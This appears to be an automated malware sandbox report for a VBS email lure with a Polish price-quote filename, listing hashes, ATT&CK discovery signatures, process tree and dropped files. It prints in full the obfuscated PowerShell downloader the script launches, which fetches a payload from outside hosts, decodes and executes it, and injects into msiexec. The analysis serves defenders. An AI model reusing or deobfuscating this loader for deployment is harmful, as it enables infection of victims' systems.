f1d2e2c963c5f1a6a4a701ede11e8c438d4e4e200111861f63d150a5dd95680d

General

Target

Prośba o wycenę - katalog przykładowy.vbs
Size

156KB
MD5

3655ed4ac8786b349f6c824ef9fbf58c
SHA1

a2c6abe2e04a0c5548288ffdaf4a9c27bc644d0b
SHA256

52bc69a2c50c4bc07047508511fe4e7c17b3f380ac3a6a2f5229330b0b1a6980
SHA512

1792ca76e88342a853ffd6f35cf53956d36178811b411361a5f15499570f02d225c53e83fc4d0b3c85ce1d4009466dc289c0fbeba1984da838110eb9e6519a48
SSDEEP

3072:xiHtveXendAy3yrLRKm+ay3tJuj8Sq2qb0M240PCOLvAtK3qfBHqnSBu46:xiHtveXendAy3yrslay3tJuj8Sq2qb0X

Score

8^/10

discovery

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
24	2632	powershell.exe
45	1884	msiexec.exe
47	1884	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1884	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3596	powershell.exe
1884	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4856	ping.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4856	ping.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
2632	powershell.exe
2632	powershell.exe
3596	powershell.exe
3596	powershell.exe
3596	powershell.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe
1884	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3596	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 4856	3096	WScript.exe	85
PID 3096 wrote to memory of 4856	3096	WScript.exe	85
PID 3096 wrote to memory of 2632	3096	WScript.exe	90
PID 3096 wrote to memory of 2632	3096	WScript.exe	90
PID 3596 wrote to memory of 1884	3596	powershell.exe	104
PID 3596 wrote to memory of 1884	3596	powershell.exe	104
PID 3596 wrote to memory of 1884	3596	powershell.exe	104
PID 3596 wrote to memory of 1884	3596	powershell.exe	104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Prośba o wycenę - katalog przykładowy.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\System32\ping.exe
  ping Horm5zl_6637.6637.6637.657e
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fiskefartjers Salomonic bullion Kyschtymite Gg Prisaendringer #>;$Vaabenfabrikken='Regier';<#Haemningsloese Euphonized Hertugdmmet Stickler #>;$Perirectitis=$nordpol+$host.UI; function Unglutinousness($Accessarily){If ($Perirectitis) {$Enden++;}$Dunjakke=$Skaansomme+$Accessarily.'Length'-$Enden; for( $Overconservative=4;$Overconservative -lt $Dunjakke;$Overconservative+=5){$Sigillography193=$Overconservative;$Kneppede+=$Accessarily[$Overconservative];$overtrdelsernes='Dyarchic';}$Kneppede;}function Slagvarer($Pigless195){ & ($Tidsplaners) ($Pigless195);}$Udenrigstjenesterne=Unglutinousness ' AppMBrndo attzLindi.alelCounlSpriay ll/Disc ';$Feltlngders=Unglutinousness ' G oTUncrl Gnas ano1Med 2Ps,u ';$Gejlende167='.dbo[RehiNPla e .ilt Opt.DiruSHabieHeinRprosv.angIAndrCMasse fripsco oPunci InjnB.rstOkkuMUdstAHornN Reua W.oGKodiE lsiRDalr] Par:Bact:ForasSteeEPle c AnkUB,nkRC.anIE viTBogsy.esupCoterFaddOTrykTCardOBlodCMoutO FosLHarm=Toop$Ta tfP stE krlPecuTXantLPantnFartgRepod ifeE,nter KaosB gn ';$Udenrigstjenesterne+=Unglutinousness 'Frys5me.n.Unex0Aflo Rep(Mgt W,usriEl,kn igd.obpoPoiswb wes Nat A keNFangTBur, Bisa1Poly0Grun.Tu n0M.lj;satr Ang,WSubtiNeedn Cla6 Tra4Ovic; ,op BurgxFodb6Ring4Skju;Rund Hj r AanvAlb :f es1Dron3 Met1Di r.Cond0Y ge)Sta S usG BeteUnvocNo skspato Rib/karr2Pala0Barn1B.ke0 aas0Klap1 Per0 Re 1S or P.iFPaamiP nnrPippePseufSculo ReaxCobr/An j1Skik3Gu.d1Omfo. Epi0Skum ';$Overconservativedrtsklub=Unglutinousness 'DecouDrejs Ud eKompR Bos-DiscaK.rsgparleDa aNSu,sTbewr ';$Fnomenologis=Unglutinousness 'T.dehSlvft biltFl,ppSa bs Bes:Obj,/Jerk/Ecc bSerrrB aiuHelttOphaa ast.UngipB lelOmo,/SkruIGrapbSk.trUdtru CysgPre t resale ig S feOplslSkuds Baae ,lps ls. Fo ppro c nubxnoni>Rigeh Supt CritLipopH glsW ea: Eng/Undi/FestpForfr AfboDr,bmAmbaeHensn Fartgue.eUnu r Arr.JordrRefisskve/sadoIAraub MarrBesluEnamgTo,ntMa.taRealgAf.veStyllBaktsMiljePed sHalv. Ledp ReacWe exHorn ';$Rancourous=Unglutinousness 'Gear>Dags ';$Tidsplaners=Unglutinousness ' su I Ovee P sxSpac ';$Febrene='Dampningen';$Overconservativenterramal131='\Hylozoist.ony';Slagvarer (Unglutinousness 'Jule$MindgAbsoLFor.OTranBRempAB biL Ile: SalatintnSteaGAllerj ggEHa bbSergsNakev.ollAP ndaSekrB,otiE EtuNStr sReto=Proc$Irrie BrunSystvRens:A stA Fl.Pnon PLased MinADepiTLazaAFina+ M s$ gebOOverVKypeE onorD laCS.nio nsnPhytS abEIndwrS,devMennAIntetUroliGenrVB.rrEUndeNSustT M sEfakuRFilcR onfaWic.m nfaaR itl Ber1 Sky3Prof1Dere ');Slagvarer (Unglutinousness 'Inta$SkrfGAssiL AyaO Eksb intaAfsvLUnve:Ant o eprTA.siARundCRutiUAffaSUnskTReac=Jeal$TurbF KonNF.rso V.nMMisrePokeN UncO sh.L.rimOZeugg,verIPhanS Fe .IdmtSU dep Mo LPiskIAc.uT or(Prfa$.ideRVandADetanDiscc.fsgO M.luSendrR spo Deau PatSFor )I ar ');Slagvarer (Unglutinousness $Gejlende167);$Fnomenologis=$Otacust[0];$Hypogastrium28=(Unglutinousness ' Fej$.illgK.ntL.picoCuraBSansa Real Hei:Bu.tsOrtso elMDiskmmap EDamnr BeagVagnsSurftTraaEQua nphil=H,miNGruneSkaawTe,r-U,fhoIndfbSejrJNerveMisiCUnloTEnem IndSLaryYFgtes tiptPhloePlanM eut. OmsNChrie Kult ila.OdalwL bre,rdlbDoigcCoryl b yIChedeContnRid t,ord ');Slagvarer ($Hypogastrium28);Slagvarer (Unglutinousness 'L ng$ HavS N eoSp rmEnk,mbew eI anrmythgG.ais V ntRnb,e Sidn unp.Aug H .pteNetta ridResteUnmarNeurs pho[verm$GrunO ligv.ankeTyverRundcLangoPlumnNigrsPyr e DudrSt.lvSulaaFyrvtFrysiPumpv brie NoxdSen rRanitSe.gsTappkAquilCarauBianbkaps]E cy= Isl$H,emUQ addSoneeKlavnPlurrPreciGnidgSodasHu htAnstjSvogelegin .ebeAb dsDeretUn,veDur.rPam nVreleReal ');$Herpetolog=Unglutinousness 'Myre$ Su.S msaoLogamFis mJ roeReg rDemigL.gasc.hotLapieustan Int. SysDTel.oU dew rknntilmlAyuboSkroaAnnidDek F,lteiChr,lTegneF,de( rdi$ProtFInt n ilioIn.rmParoeCapsnPrbeo forlTylvohaugg Subi.nissB ad,Fort$GlobAUndefTelef snkaHypotBudgtSesseBespdFooleMedasToed)Sp b ';$Affattedes=$Angrebsvaabens;Slagvarer (Unglutinousness ' im $SpgeGSabbl PsioRemaBLoksaPetrlGlug:MeleNKompoTrimNDialHSyrlyCrosp.aleeTe eRhiorBLogiO ho,LLegaiarbecBlad1 Luc1 Fla0Zany=P.ot(BaxyT FryePe.pSTu iTd ns-SummpPagoaTo dTT llhMayo Le e$ BreAMac FBndeFUngkaCarrT KleTRetseVelgdovereIndesHemo)Indf ');while (!$Nonhyperbolic110) {Slagvarer (Unglutinousness ' Ele$Sterg,glslknaloPa zbpentaNon.l Roe: CorKpistvDesia snedNazerP emaPoron lastKommeChucrKonc=Slov$Kno,tBe gr unau emfeSynk ') ;Slagvarer $Herpetolog;Slagvarer (Unglutinousness ' ros FritNonca Th rVettThauc-OrnasQ adL andeFyldEDreipEc r Udga4balt ');Slagvarer (Unglutinousness '.lum$ A rGStiklFideoDormBDodeALavrlIndm:BoarNPlagOP lyN Unbhdek.y.rappPinnEPrecRL arBPol OTel,LRubrI NetcR de1Wayf1tar,0Z nc=D pe(IlpaTDepoeUddaSGypstSeat-DrejPWorkAOprrT DacHTriv ejen$Afspaf dlfWidoFAm taUnfoTVrditFde eDelpdSp leOutnsTilg) ,nd ') ;Slagvarer (Unglutinousness 'Stam$Ov rGmathL fiOPlatBKl.bAChilLPark: fsAMiliRapicbJakoEOfthJMadedThelSJog pHerrlSkrmiEnemgOverTPietEPeasrNe snstikeFrus=Inds$JennG ,avLPersOPr,mbLampaH rml Lan:Bv eFS mmACrincT lrIVellLOpiniScalTMou.aPatlTOthaoKredRoolaYU.va3Uoev6Spar+ ,dk+ mst% Her$ CypOFolkTSupraDidycH loufuldsGudst .ap.OpkocBarnOLystuAlarnUdgaTCyto ') ;$Fnomenologis=$Otacust[$Arbejdspligterne];}$Anticipators=340909;$arbejdspladsers=30602;Slagvarer (Unglutinousness 'Unde$BageGkirslPrevOAssebAbstaVandlReak:D nusUltrH UdsEA talretstD vaE.abbRPrevdNuclkOverkMycaE CadrSwo eWin sF gb2T ll6Be l sild= ,on NedsgVolueTalwtvase-,oldcsam.oSumpn vertTilserumenP,nktSleg arc$,mbeaBallFka.ofgen aUds T Fo,t NoneUnacD t oEIam sDest ');Slagvarer (Unglutinousness 'slut$fo lgBea.lGraeo G.db Ph aDemolInsu:OutsVL,ceiHuncpAr ep C.eeFortl HanaAmildCine Myrt= Int Inn[EnebSProsyPibesPlagt AlkePropmTe n.Re rCAnstoun enSangv BareInternatut Gen]Anal:Komp: DomFHydrrFuraoDka mGro BLimia orls OtoePrec6Vedd4ske,SLivstMonorSkrhiEndenCupog.uto(Subl$Fav SCorphRabieFrihlunent ngeKor rPetadSaxkk ejlkMin.eGrunr Slve Sygs Sup2Warr6Dela)Sm.t ');Slagvarer (Unglutinousness 'Xylo$ VasgActiLTilso OmkBim aaFriel obb:B.stUByldn,empG uncD Udso VolmSkinM.wagEPostLmagnIPibeg BulE yprOog,EGotc Udhu=V nd Se,i[EkstS SokYAnkeSRegnTDeflES.mhMsvar.sprlt A,he llxAnsatDamo. elE ournBackcIn,oo BevD Subi svin ShoG No ] are: Upb: asyat elsHumaCCo sIIsneiSemi.UndsgB,llELabaTGuldsBogltComprTrapIGenoNAprjg rg(Scum$QuarvU,acIApaypWomaPNon EInkal BubA IntdLege) Arb ');Slagvarer (Unglutinousness 'Bic $Z mogGymnlProfOVartBSkilaPreslOut,: onrMBowsaAgglCKol MJo bOS,teRCoprRSm aiAllesVulc=Nonb$LeanUEminnMategLeptdBereOPrimmJernM,piseDokklSindI HilgpaakePredr KvaEGuan.SlaaS razULateb UdssB,nat PapR RacI ShoNPostG al( Di $A abAGr,nN SkatListiValdc AnoITillPBenzaSndrtS ovoEc erKexsSUnpa,e sl$g unATrapR SambSub.EOddsJGradDRudds lapTokrL HenaOmegdKam.SOr lED,nnrC taSCen )scut ');Slagvarer $Macmorris;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fiskefartjers Salomonic bullion Kyschtymite Gg Prisaendringer #>;$Vaabenfabrikken='Regier';<#Haemningsloese Euphonized Hertugdmmet Stickler #>;$Perirectitis=$nordpol+$host.UI; function Unglutinousness($Accessarily){If ($Perirectitis) {$Enden++;}$Dunjakke=$Skaansomme+$Accessarily.'Length'-$Enden; for( $Overconservative=4;$Overconservative -lt $Dunjakke;$Overconservative+=5){$Sigillography193=$Overconservative;$Kneppede+=$Accessarily[$Overconservative];$overtrdelsernes='Dyarchic';}$Kneppede;}function Slagvarer($Pigless195){ & ($Tidsplaners) ($Pigless195);}$Udenrigstjenesterne=Unglutinousness ' AppMBrndo attzLindi.alelCounlSpriay ll/Disc ';$Feltlngders=Unglutinousness ' G oTUncrl Gnas ano1Med 2Ps,u ';$Gejlende167='.dbo[RehiNPla e .ilt Opt.DiruSHabieHeinRprosv.angIAndrCMasse fripsco oPunci InjnB.rstOkkuMUdstAHornN Reua W.oGKodiE lsiRDalr] Par:Bact:ForasSteeEPle c AnkUB,nkRC.anIE viTBogsy.esupCoterFaddOTrykTCardOBlodCMoutO FosLHarm=Toop$Ta tfP stE krlPecuTXantLPantnFartgRepod ifeE,nter KaosB gn ';$Udenrigstjenesterne+=Unglutinousness 'Frys5me.n.Unex0Aflo Rep(Mgt W,usriEl,kn igd.obpoPoiswb wes Nat A keNFangTBur, Bisa1Poly0Grun.Tu n0M.lj;satr Ang,WSubtiNeedn Cla6 Tra4Ovic; ,op BurgxFodb6Ring4Skju;Rund Hj r AanvAlb :f es1Dron3 Met1Di r.Cond0Y ge)Sta S usG BeteUnvocNo skspato Rib/karr2Pala0Barn1B.ke0 aas0Klap1 Per0 Re 1S or P.iFPaamiP nnrPippePseufSculo ReaxCobr/An j1Skik3Gu.d1Omfo. Epi0Skum ';$Overconservativedrtsklub=Unglutinousness 'DecouDrejs Ud eKompR Bos-DiscaK.rsgparleDa aNSu,sTbewr ';$Fnomenologis=Unglutinousness 'T.dehSlvft biltFl,ppSa bs Bes:Obj,/Jerk/Ecc bSerrrB aiuHelttOphaa ast.UngipB lelOmo,/SkruIGrapbSk.trUdtru CysgPre t resale ig S feOplslSkuds Baae ,lps ls. Fo ppro c nubxnoni>Rigeh Supt CritLipopH glsW ea: Eng/Undi/FestpForfr AfboDr,bmAmbaeHensn Fartgue.eUnu r Arr.JordrRefisskve/sadoIAraub MarrBesluEnamgTo,ntMa.taRealgAf.veStyllBaktsMiljePed sHalv. Ledp ReacWe exHorn ';$Rancourous=Unglutinousness 'Gear>Dags ';$Tidsplaners=Unglutinousness ' su I Ovee P sxSpac ';$Febrene='Dampningen';$Overconservativenterramal131='\Hylozoist.ony';Slagvarer (Unglutinousness 'Jule$MindgAbsoLFor.OTranBRempAB biL Ile: SalatintnSteaGAllerj ggEHa bbSergsNakev.ollAP ndaSekrB,otiE EtuNStr sReto=Proc$Irrie BrunSystvRens:A stA Fl.Pnon PLased MinADepiTLazaAFina+ M s$ gebOOverVKypeE onorD laCS.nio nsnPhytS abEIndwrS,devMennAIntetUroliGenrVB.rrEUndeNSustT M sEfakuRFilcR onfaWic.m nfaaR itl Ber1 Sky3Prof1Dere ');Slagvarer (Unglutinousness 'Inta$SkrfGAssiL AyaO Eksb intaAfsvLUnve:Ant o eprTA.siARundCRutiUAffaSUnskTReac=Jeal$TurbF KonNF.rso V.nMMisrePokeN UncO sh.L.rimOZeugg,verIPhanS Fe .IdmtSU dep Mo LPiskIAc.uT or(Prfa$.ideRVandADetanDiscc.fsgO M.luSendrR spo Deau PatSFor )I ar ');Slagvarer (Unglutinousness $Gejlende167);$Fnomenologis=$Otacust[0];$Hypogastrium28=(Unglutinousness ' Fej$.illgK.ntL.picoCuraBSansa Real Hei:Bu.tsOrtso elMDiskmmap EDamnr BeagVagnsSurftTraaEQua nphil=H,miNGruneSkaawTe,r-U,fhoIndfbSejrJNerveMisiCUnloTEnem IndSLaryYFgtes tiptPhloePlanM eut. OmsNChrie Kult ila.OdalwL bre,rdlbDoigcCoryl b yIChedeContnRid t,ord ');Slagvarer ($Hypogastrium28);Slagvarer (Unglutinousness 'L ng$ HavS N eoSp rmEnk,mbew eI anrmythgG.ais V ntRnb,e Sidn unp.Aug H .pteNetta ridResteUnmarNeurs pho[verm$GrunO ligv.ankeTyverRundcLangoPlumnNigrsPyr e DudrSt.lvSulaaFyrvtFrysiPumpv brie NoxdSen rRanitSe.gsTappkAquilCarauBianbkaps]E cy= Isl$H,emUQ addSoneeKlavnPlurrPreciGnidgSodasHu htAnstjSvogelegin .ebeAb dsDeretUn,veDur.rPam nVreleReal ');$Herpetolog=Unglutinousness 'Myre$ Su.S msaoLogamFis mJ roeReg rDemigL.gasc.hotLapieustan Int. SysDTel.oU dew rknntilmlAyuboSkroaAnnidDek F,lteiChr,lTegneF,de( rdi$ProtFInt n ilioIn.rmParoeCapsnPrbeo forlTylvohaugg Subi.nissB ad,Fort$GlobAUndefTelef snkaHypotBudgtSesseBespdFooleMedasToed)Sp b ';$Affattedes=$Angrebsvaabens;Slagvarer (Unglutinousness ' im $SpgeGSabbl PsioRemaBLoksaPetrlGlug:MeleNKompoTrimNDialHSyrlyCrosp.aleeTe eRhiorBLogiO ho,LLegaiarbecBlad1 Luc1 Fla0Zany=P.ot(BaxyT FryePe.pSTu iTd ns-SummpPagoaTo dTT llhMayo Le e$ BreAMac FBndeFUngkaCarrT KleTRetseVelgdovereIndesHemo)Indf ');while (!$Nonhyperbolic110) {Slagvarer (Unglutinousness ' Ele$Sterg,glslknaloPa zbpentaNon.l Roe: CorKpistvDesia snedNazerP emaPoron lastKommeChucrKonc=Slov$Kno,tBe gr unau emfeSynk ') ;Slagvarer $Herpetolog;Slagvarer (Unglutinousness ' ros FritNonca Th rVettThauc-OrnasQ adL andeFyldEDreipEc r Udga4balt ');Slagvarer (Unglutinousness '.lum$ A rGStiklFideoDormBDodeALavrlIndm:BoarNPlagOP lyN Unbhdek.y.rappPinnEPrecRL arBPol OTel,LRubrI NetcR de1Wayf1tar,0Z nc=D pe(IlpaTDepoeUddaSGypstSeat-DrejPWorkAOprrT DacHTriv ejen$Afspaf dlfWidoFAm taUnfoTVrditFde eDelpdSp leOutnsTilg) ,nd ') ;Slagvarer (Unglutinousness 'Stam$Ov rGmathL fiOPlatBKl.bAChilLPark: fsAMiliRapicbJakoEOfthJMadedThelSJog pHerrlSkrmiEnemgOverTPietEPeasrNe snstikeFrus=Inds$JennG ,avLPersOPr,mbLampaH rml Lan:Bv eFS mmACrincT lrIVellLOpiniScalTMou.aPatlTOthaoKredRoolaYU.va3Uoev6Spar+ ,dk+ mst% Her$ CypOFolkTSupraDidycH loufuldsGudst .ap.OpkocBarnOLystuAlarnUdgaTCyto ') ;$Fnomenologis=$Otacust[$Arbejdspligterne];}$Anticipators=340909;$arbejdspladsers=30602;Slagvarer (Unglutinousness 'Unde$BageGkirslPrevOAssebAbstaVandlReak:D nusUltrH UdsEA talretstD vaE.abbRPrevdNuclkOverkMycaE CadrSwo eWin sF gb2T ll6Be l sild= ,on NedsgVolueTalwtvase-,oldcsam.oSumpn vertTilserumenP,nktSleg arc$,mbeaBallFka.ofgen aUds T Fo,t NoneUnacD t oEIam sDest ');Slagvarer (Unglutinousness 'slut$fo lgBea.lGraeo G.db Ph aDemolInsu:OutsVL,ceiHuncpAr ep C.eeFortl HanaAmildCine Myrt= Int Inn[EnebSProsyPibesPlagt AlkePropmTe n.Re rCAnstoun enSangv BareInternatut Gen]Anal:Komp: DomFHydrrFuraoDka mGro BLimia orls OtoePrec6Vedd4ske,SLivstMonorSkrhiEndenCupog.uto(Subl$Fav SCorphRabieFrihlunent ngeKor rPetadSaxkk ejlkMin.eGrunr Slve Sygs Sup2Warr6Dela)Sm.t ');Slagvarer (Unglutinousness 'Xylo$ VasgActiLTilso OmkBim aaFriel obb:B.stUByldn,empG uncD Udso VolmSkinM.wagEPostLmagnIPibeg BulE yprOog,EGotc Udhu=V nd Se,i[EkstS SokYAnkeSRegnTDeflES.mhMsvar.sprlt A,he llxAnsatDamo. elE ournBackcIn,oo BevD Subi svin ShoG No ] are: Upb: asyat elsHumaCCo sIIsneiSemi.UndsgB,llELabaTGuldsBogltComprTrapIGenoNAprjg rg(Scum$QuarvU,acIApaypWomaPNon EInkal BubA IntdLege) Arb ');Slagvarer (Unglutinousness 'Bic $Z mogGymnlProfOVartBSkilaPreslOut,: onrMBowsaAgglCKol MJo bOS,teRCoprRSm aiAllesVulc=Nonb$LeanUEminnMategLeptdBereOPrimmJernM,piseDokklSindI HilgpaakePredr KvaEGuan.SlaaS razULateb UdssB,nat PapR RacI ShoNPostG al( Di $A abAGr,nN SkatListiValdc AnoITillPBenzaSndrtS ovoEc erKexsSUnpa,e sl$g unATrapR SambSub.EOddsJGradDRudds lapTokrL HenaOmegdKam.SOr lED,nnrC taSCen )scut ');Slagvarer $Macmorris;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2247453c28acd1eb75cfe181540458a8

SHA1
851fc5a9950d422d76163fdc6a453d6859d56660

SHA256
358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

SHA512
42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ux40aojt.gil.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Hylozoist.ony

Filesize
483KB

MD5
2730ea300dd8f8a61c62aa15dbae95ec

SHA1
81135e9e6be89fa71c26cea562db481d0e19e955

SHA256
fb9a4010024a0621a1aa44aeb5de465e20ddd34272cfc9010d451064ffc83f03

SHA512
62e21216a80d1f2a6227d968503370d020056f6d26b26c3e95225d6c64891889f849f7541e36da86c89daf215fde8220ffcd232d21cf5051a586ee0b06a21435

Download Submit
memory/1884-57-0x0000000000650000-0x00000000018A4000-memory.dmp

Filesize
18.3MB

Download
memory/1884-52-0x0000000000650000-0x00000000018A4000-memory.dmp

Filesize
18.3MB

Download
memory/1884-53-0x0000000000650000-0x00000000018A4000-memory.dmp

Filesize
18.3MB

Download
memory/1884-54-0x0000000000650000-0x00000000018A4000-memory.dmp

Filesize
18.3MB

Download
memory/2632-12-0x00007FFB84830000-0x00007FFB852F1000-memory.dmp

Filesize
10.8MB

Download
memory/2632-18-0x00007FFB84830000-0x00007FFB852F1000-memory.dmp

Filesize
10.8MB

Download
memory/2632-21-0x00007FFB84830000-0x00007FFB852F1000-memory.dmp

Filesize
10.8MB

Download
memory/2632-16-0x00007FFB84830000-0x00007FFB852F1000-memory.dmp

Filesize
10.8MB

Download
memory/2632-14-0x00007FFB84830000-0x00007FFB852F1000-memory.dmp

Filesize
10.8MB

Download
memory/2632-13-0x00007FFB84833000-0x00007FFB84835000-memory.dmp

Filesize
8KB

Download
memory/2632-11-0x00007FFB84830000-0x00007FFB852F1000-memory.dmp

Filesize
10.8MB

Download
memory/2632-0-0x00007FFB84833000-0x00007FFB84835000-memory.dmp

Filesize
8KB

Download
memory/2632-1-0x0000026FEE4B0000-0x0000026FEE4D2000-memory.dmp

Filesize
136KB

Download
memory/3596-26-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/3596-38-0x0000000006730000-0x000000000674E000-memory.dmp

Filesize
120KB

Download
memory/3596-39-0x00000000067D0000-0x000000000681C000-memory.dmp

Filesize
304KB

Download
memory/3596-40-0x0000000007F50000-0x00000000085CA000-memory.dmp

Filesize
6.5MB

Download
memory/3596-41-0x0000000007880000-0x000000000789A000-memory.dmp

Filesize
104KB

Download
memory/3596-42-0x00000000079A0000-0x0000000007A36000-memory.dmp

Filesize
600KB

Download
memory/3596-43-0x0000000007940000-0x0000000007962000-memory.dmp

Filesize
136KB

Download
memory/3596-44-0x0000000008B80000-0x0000000009124000-memory.dmp

Filesize
5.6MB

Download
memory/3596-36-0x0000000006230000-0x0000000006584000-memory.dmp

Filesize
3.3MB

Download
memory/3596-46-0x0000000009130000-0x000000000DC71000-memory.dmp

Filesize
75.3MB

Download
memory/3596-25-0x0000000005910000-0x0000000005976000-memory.dmp

Filesize
408KB

Download
memory/3596-24-0x0000000005860000-0x0000000005882000-memory.dmp

Filesize
136KB

Download
memory/3596-23-0x0000000005A20000-0x0000000006048000-memory.dmp

Filesize
6.2MB

Download
memory/3596-22-0x0000000002E30000-0x0000000002E66000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads